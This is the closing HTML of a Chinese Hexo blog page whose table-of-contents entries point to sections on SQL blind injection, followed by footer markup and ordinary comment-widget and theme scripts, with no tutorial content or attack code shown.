class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E5%80%BC"><span class="toc-number">2.7.</span> <span class="toc-text">查询字段中所有的值</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Boolean%E7%9B%B2%E6%B3%A8"><span class="toc-number">3.</span> <span class="toc-text">Boolean盲注</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527518/0')"><div id="footer-wrap"><div class="copyright">©2020 - 2023 By BaiKer</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>function loadValine () {
function initValine () {
const valine = new Valine(Object.assign({
el: '#vcomment',
appId: 'B4CWJLUwBNNEjD2SoNxuy03K-gzGzoHsz',
appKey: '6vo75MB0241puEkTNHhBsuv9',
avatar: 'monsterid',
serverURLs: '',
emojiMaps: "",
path: window.location.pathname,
visitor: false
}, null))
}
if (typeof Valine === 'function') initValine()
else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}
if ('Valine' === 'Valine' || !false) {
if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
else setTimeout(loadValine, 0)
} else {
function loadOtherComment () {
loadValine()
}
}</script></div><link rel="stylesheet" href="https://baiker.top/css/custom.css"><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>